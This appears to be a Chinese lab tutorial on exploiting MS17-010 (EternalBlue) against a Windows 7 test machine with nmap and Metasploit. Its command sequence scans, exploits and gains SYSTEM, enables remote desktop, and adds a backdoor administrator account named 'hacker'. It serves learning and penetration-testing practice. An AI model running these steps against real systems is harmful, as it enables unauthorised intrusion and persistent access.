一、简介:

MS17-010又称为永恒之蓝,通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞。目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、探测

靶机:win7 x64 sp1 IP:192.168.66.98
攻击机:kali 2020.4 IP:192.168.66.138

1、通过nmap扫描目标机器,发现139、445端口

nmap -V -T4 192.168.66.98   
#T4设置扫描速度,越高越快(1-5)
#-V显示详情

结果:

image-20210809161636575

2、使用msf探测是否存在MS17-010漏洞

a、寻找MS17-010模块

search MS17-010

发现2个探测模块和4个利用模块

image-20210809161651064

3、利用auxiliary/scanner/smb/smb_ms17_010探测模块进行漏洞探测

use auxiliary/scanner/smb/smb_ms17_010   	#调用探测模块
show options #显示配置参数
set RHOSTS 192.168.66.98 #设置目标IP
run #运行探测程序

探测出存在MS17-010漏洞

image-20210809161701790

三、利用

1、使用攻击模块对靶机发起攻击

use exploit/windows/smb/ms17_010_eternalblue    #调用攻击模块
show options #显示配置参数
set RHOSTS 192.168.66.98 #设置目标IP
run #运行探测程序

攻击成功,进入后渗透攻击阶段

image-20210809161712134

2、靶机信息收集

a、查看目标主机详细信息

sysinfo

image-20210809161720244

b、查看当前获取的权限

getuid

image-20210809161730216

system权限,无需提权

3、开启远程桌面

run getgui -e

image-20210809161744651

成功开启远程桌面

4、切换到cmd命令行模式

shell

image-20210809161756295

5、添加用户

net user  

image-20210809161805432

net user hacker hacker.123 /add        #添加用户、密码

net localgroup administrators hacker /add #提权至管理员组

net localgroup administrators #查看管理员组成员

image-20210809161814628

提权成功

6、开启远程桌面连接

a、win+r,输入mstsc调出远程桌面,输入账号密码进行远程桌面连接

image-20210809161826717

b、成功连接至靶机

image-20210809161839547

至此,本次利用结束。后文附上meterpreter的其他指令,不做演示。